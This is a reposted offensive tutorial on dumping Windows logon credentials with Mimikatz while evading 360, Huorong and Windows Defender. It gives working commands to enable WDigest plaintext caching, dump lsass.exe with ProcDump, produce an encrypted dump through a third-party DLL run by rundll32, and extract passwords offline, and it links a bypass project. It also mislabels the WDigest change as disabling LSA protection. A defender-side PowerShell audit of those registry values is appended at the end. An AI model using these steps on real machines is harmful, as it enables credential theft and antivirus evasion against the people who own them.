Title: Mimikatz usage and AV evasion (bypassing 360, Firefox and Windows Defender)


1. Modifying the registry so Mimikatz bypasses LSA protection (EDR and WD are not considered for now)

Mimikatz principle: Mimikatz reads the plaintext logon passwords stored in the lsass.exe process (lsass.exe handles local security and logon policy). First of all, dumping with Mimikatz requires administrator rights. On Win10, Win11, Win2012 and other versions the system enables LSA protection, and the plaintext password field shows null.

Step 1, raise privileges: privilege::debug
Step 2, dump: sekurlsa::logonPasswords

Turning off LSA protection: with administrator permissions, modify the registry, then use a script or any other method to restart the system so that the administrator of the victim machine logs in again. The plaintext password of this logon is saved in the lsass.exe process, and dumping again with Mimikatz shows the plaintext password. To restore the registry, change 1 back to 0 directly.

Modification command: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

2. Dumping with Procdump to bypass 360 and Firefox

Bypass idea: Because Mimikatz is so powerful, the major EDRs keep going further and further in defending against it. So if we try to make Mimikatz itself evade detection, even once it passes static scanning we still have to consider all kinds of tricks to bypass detection of the dumping action, and that undoubtedly costs a lot of time. Instead, we can take the plaintext passwords already stored in lsass.exe out of the machine and recover them with Mimikatz locally.

Implementation: the premise is that LSA protection has already been turned off and administrator rights are available. Use the Microsoft project Procdump to dump (since it is a Microsoft project, no EDR flags it), retrieve the password information stored in the lsass process and save it as niuma.dmp. Procdump project address: https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

Command: ProcDump.exe -accepteula -ma lsass.exe niuma.dmp

Save the generated niuma.dmp locally and use Mimikatz to extract the plaintext password locally. Because the information has been pulled into the same directory as Mimikatz in the local environment, ordinary user permissions are enough to read the plaintext password from niuma.dmp.

Step 1: sekurlsa::minidump niuma.dmp
Step 2: sekurlsa::logonPasswords full

3. Encrypted storage via DLL to bypass 360, Firefox and Windows Defender

Principle: Windows Defender's detection logic works at the file layer, so a dump file generated from lsass.exe gets deleted. Therefore the storage must be encrypted, handled in memory through a DLL, in order to bypass WD.

Implementation: the premise is that LSA protection has been turned off and administrator privileges are available. An error may occur during operation (no specified module reference); you then need to find the dependencies of the DLL file and save them into the same directory. Use the command to generate an encrypted test.log, saved under the path C:/Windows/Temp, copy the file locally, decrypt test.log to obtain the original dump, and then obtain the plaintext password in the same way as in the second Mimikatz method.

Step 1, generate the encrypted file: rundll32 DumpHash.dll dllmain
Step 2, decrypt locally: mimikatz decryption.exe test.log 1.bin
Step 3, read the plaintext (same as the second method, no screenshots taken):
sekurlsa::minidump 1.bin
sekurlsa::logonPasswords full

4. DLL files and decryption files

Github project address: https://github.com/xjsafe/MimikatzBypass

Reposted from the original article: https://www.vpss.cc/381.html
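As an added defender-side check (not part of the reposted article or the MimikatzBypass project), the PowerShell function below audits the WDigest UseLogonCredential value the post modifies and reports it when set to 1; it additionally reads the Lsa RunAsPPL value, which is the actual LSA Protection switch and is not mentioned on the page, and returns one object per weak setting so the check can be run across hosts from a management script.

```powershell
function Test-CredentialCachingHardening {
    # Audits the two registry values relevant to this post: WDigest plaintext
    # caching (the value the post sets to 1) and LSA Protection (RunAsPPL).
    $findings = @()

    # WDigest caching: value 1 means plaintext credentials are kept in lsass.exe.
    $wdigestPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $wdigest = Get-ItemProperty -Path $wdigestPath -Name UseLogonCredential -ErrorAction SilentlyContinue
    if ($null -ne $wdigest -and $wdigest.UseLogonCredential -eq 1) {
        $findings += [pscustomobject]@{
            Setting = 'WDigest\UseLogonCredential'
            Value   = 1
            Risk    = 'Plaintext credentials are cached in lsass.exe after the next logon'
            Fix     = "Set-ItemProperty -Path '$wdigestPath' -Name UseLogonCredential -Value 0 -Type DWord"
        }
    }

    # LSA Protection: RunAsPPL absent or 0 means lsass.exe is not a protected process,
    # so any admin-level tool can open it and take a full memory dump.
    $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $lsa = Get-ItemProperty -Path $lsaPath -Name RunAsPPL -ErrorAction SilentlyContinue
    $lsaValue = if ($null -eq $lsa) { 'absent' } else { $lsa.RunAsPPL }
    if ($null -eq $lsa -or $lsa.RunAsPPL -eq 0) {
        $findings += [pscustomobject]@{
            Setting = 'Lsa\RunAsPPL'
            Value   = $lsaValue
            Risk    = 'LSA Protection is off; lsass.exe can be opened for a full memory dump'
            Fix     = "Set-ItemProperty -Path '$lsaPath' -Name RunAsPPL -Value 1 -Type DWord (reboot required)"
        }
    }

    return $findings
}

# Example run: prints a table of weak settings, or nothing when both are hardened.
Test-CredentialCachingHardening | Format-Table -AutoSize
```

Run it in an elevated session; an empty result means both values are in their hardened state on that host.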
